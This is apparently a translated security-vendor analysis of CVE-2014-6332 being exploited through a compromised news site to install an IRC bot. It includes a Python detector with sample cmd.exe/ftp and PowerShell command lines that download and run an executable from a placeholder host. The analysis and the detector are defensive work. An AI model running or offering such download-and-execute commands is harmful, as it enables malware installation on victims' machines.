
Attackers use CVE-2014-6332

Recently we wrote about a new dangerous vulnerability in Windows, CVE-2014-6332 (MS14-064), which was present in the OleAut32.dll library, or rather in the OleAut32!SafeArrayRedim function. This function is used by the VBScript engine (vbscript.dll) for run-time resizing of arrays in the SAFEARRAY format. SafeArrayRedim itself contained a flaw: it modified the array size field inside the structure and then returned a failure code for the operation, which left the structure describing a larger buffer than had actually been allocated. See more here.



Because the exploit for this vulnerability (Windows OLE Automation Array Remote Code Execution Vulnerability) can, in effect, operate directly on memory through the corruption of the buffer header structure by the OS function, it does not need to resort to use-after-free techniques; the whole exploitation is reduced to the sequential execution of several functions that start a process from a VBScript function, bypassing DEP and ASLR.

Analysts at our anti-virus lab found exploitation of this vulnerability in-the-wild, in the form of malicious content on the compromised website of a popular Bulgarian news agency. We observed one of the web pages of this site that was compromised and redirected visitors to install malware using CVE-2014-6332. The appearance of this compromised web page is shown in the screenshot below.



The HTML source of this web page contains a malicious iframe that points to the page hosting the exploit.



As seen in the screenshot above, the exploit is placed on a web page belonging to the natmasla[.]ru domain. It is detected by ESET AV products as Win32/Exploit.CVE-2014-6332.A. The discovered exploit is based on a proof-of-concept code published by a Chinese author, whose details are given in the PoC.



It was easy for the attacker to modify the original PoC to install their malware on the system.

Oddly enough, the malicious page contains the exploit code twice. In the first case, the payload is a set of Windows command interpreter (cmd.exe) instructions, listed in the screenshot below.



As you can see, this set of commands contains a group prefixed with @echo, which writes special instructions to a text file (KdFKkDls.txt; the file name may differ between modifications of the exploit). These instructions are intended for the ftp application, which is run with the special -s switch (take the commands to execute from a file). The ftp instructions written to the file connect to a remote server with the specified username and password, then download and launch the executable file.

The second payload looks like the following set of instructions.



It can be seen that this time PowerShell is used to download the executable file from a remote server.
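Both payloads above (the @echo/ftp -s chain and the PowerShell download) can be picked out of a process-creation command line. The following is an added example of such detection logic, not code from the article or from ESET; the sample command lines are constructed to mirror the description, with placeholder hosts and credentials, and the PowerShell pattern (WebClient.DownloadFile) is an assumption, since the article only says PowerShell downloads the executable.

```python
import re

# Constructed cmd.exe payload modelled on the article's first payload:
# ftp instructions are echoed into KdFKkDls.txt, fed to ftp with -s,
# and the fetched executable is launched. Host and credentials are placeholders.
SAMPLE_CMD = (
    "cmd.exe /c @echo open files.example>KdFKkDls.txt"
    "&@echo user>>KdFKkDls.txt&@echo pass>>KdFKkDls.txt"
    "&@echo binary>>KdFKkDls.txt&@echo get a.exe>>KdFKkDls.txt"
    "&@echo bye>>KdFKkDls.txt&ftp -s:KdFKkDls.txt&a.exe"
)
# Constructed PowerShell payload (assumed download-cradle shape).
SAMPLE_PS = (
    "powershell -nop -c (New-Object Net.WebClient)"
    ".DownloadFile('http://files.example/a.exe','a.exe');a.exe"
)

# echo ... > file  or  echo ... >> file : captures the file being written
REDIRECT_RE = re.compile(r"@?echo\b[^&>]*>{1,2}\s*([^\s&]+)", re.I)
# ftp -s:file : captures the script file ftp is told to execute
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\b[^&]*?-s:\s*([^\s&]+)", re.I)
# powershell followed by a download primitive or a URL
PS_DOWNLOAD_RE = re.compile(
    r"\bpowershell(?:\.exe)?\b.*?(?:downloadfile|downloadstring|https?://)",
    re.I | re.S)

def split_commands(cmdline):
    """Split a cmd.exe line on its command separators (&&, &, ||)."""
    return [c.strip() for c in re.split(r"&&|&|\|\|", cmdline) if c.strip()]

def analyze(cmdline):
    """Return (finding, detail) pairs for the patterns described above."""
    findings, written = [], set()
    for part in split_commands(cmdline):
        m = REDIRECT_RE.search(part)
        if m:
            written.add(m.group(1).lower())      # remember files built via echo
        m = FTP_SCRIPT_RE.search(part)
        if m:
            script = m.group(1).lower()
            # Strongest signal: ftp -s reading a file this same line just wrote
            tag = "ftp_script_from_echo" if script in written else "ftp_script"
            findings.append((tag, script))
        if PS_DOWNLOAD_RE.search(part):
            findings.append(("powershell_download", part))
    return findings
```

Feed it the CommandLine field of process-creation events (e.g. Sysmon event 1) and alert on any finding; "ftp_script_from_echo" is the exact chain the article describes.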

The malware downloaded in this way is detected by ESET AV products as Win32/IRCBot.NHR. It has a number of features in its arsenal, including carrying out DDoS attacks and giving the intruders remote access to the computer.

Source: https://habr.com/ru/post/244115/